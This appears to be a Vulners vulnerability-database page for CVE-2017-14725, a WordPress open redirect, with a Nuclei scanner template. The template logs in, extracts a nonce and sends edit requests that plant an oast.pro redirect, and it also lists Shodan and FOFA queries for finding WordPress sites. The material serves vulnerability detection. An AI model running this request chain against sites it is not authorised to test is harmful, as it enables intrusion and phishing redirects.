| Reporter | Title | Published | Views | Family All 36 |
|---|---|---|---|---|
| CVE-2017-14725 | 20 Nov 202502:20 | – | circl | |
| WordPress User and Term Editor Screens Open Redirect Vulnerability | 21 Sep 201700:00 | – | cnvd | |
| CVE-2017-14725 | 23 Sep 201720:00 | – | cve | |
| CVE-2017-14725 | 23 Sep 201720:00 | – | cvelist | |
| [SECURITY] [DLA 1151-1] wordpress security update | 31 Oct 201715:22 | – | debian | |
| [SECURITY] [DSA 3997-1] wordpress security update | 11 Oct 201711:51 | – | debian | |
| CVE-2017-14725 | 23 Sep 201720:00 | – | debiancve | |
| Debian DSA-3997-1 : wordpress - security update | 12 Oct 201700:00 | – | nessus | |
| Linux Distros Unpatched Vulnerability : CVE-2017-14725 | 24 Aug 202500:00 | – | nessus | |
| WordPress 4.8.x < 4.8.2 Multiple Vulnerabilities | 5 Nov 201800:00 | – | nessus |
id: CVE-2017-14725
info:
name: WordPress < 4.8.2 - Authenticated Open Redirect
author: 0x_Akoko
severity: medium
description: |
WordPress versions before 4.8.2 contain an open redirect caused by improper validation in wp-admin/edit-tag-form.php and wp-admin/user-edit.php, letting attackers redirect users to malicious sites, exploit requires access to admin interface.
impact: |
Attackers can redirect authenticated users to malicious sites, potentially leading to phishing or malware distribution.
remediation: |
Update to WordPress 4.8.2 or later.
reference:
- https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
- https://core.trac.wordpress.org/changeset/41398
- https://nvd.nist.gov/vuln/detail/CVE-2017-14725
- http://www.securitytracker.com/id/1039553
- https://www.debian.org/security/2017/dsa-3997
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2017-14725
cwe-id: CWE-601
epss-score: 0.02134
epss-percentile: 0.79629
cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 5
vendor: wordpress
product: wordpress
shodan-query:
- http.component:"wordpress"
- cpe:"cpe:2.3:a:wordpress:wordpress"
fofa-query: body="oembed" && body="wp-"
tags: cve,cve2017,wpscan,wordpress,redirect,authenticated
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(header, "wordpress_logged_in")
condition: and
internal: true
- raw:
- |
GET /wp-admin/term.php?taxonomy=category&tag_ID=1&wp_http_referer=https%3A%2F%2Foast.pro HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, '_wpnonce')
condition: and
internal: true
extractors:
- type: regex
name: nonce
group: 1
internal: true
regex:
- 'id="_wpnonce" name="_wpnonce" value="([a-f0-9]+)"'
- raw:
- |
POST /wp-admin/edit-tags.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=editedtag&tag_ID=1&taxonomy=category&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fterm.php%3Ftaxonomy%3Dcategory%26tag_ID%3D1%26wp_http_referer%3Dhttps%253A%252F%252Foast.pro&name=Uncategorized&slug=uncategorized&parent=-1&description=
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(header, 'wp_http_referer=https')
condition: and
internal: true
- raw:
- |
GET /wp-admin/term.php?taxonomy=category&tag_ID=1&wp_http_referer=https%3A%2F%2Foast.pro&message=3 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "href=\"https://oast.pro\"")
- contains(body, "Back to Categories")
condition: and
# digest: 4a0a00473045022036a32200841660ae3e709d109a965917ff3465a54badbd292a434f61edd62367022100b316199f9aa17df2cfebd9f97456067f06e7057e5c98755a3dec3fe9a28c70db:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation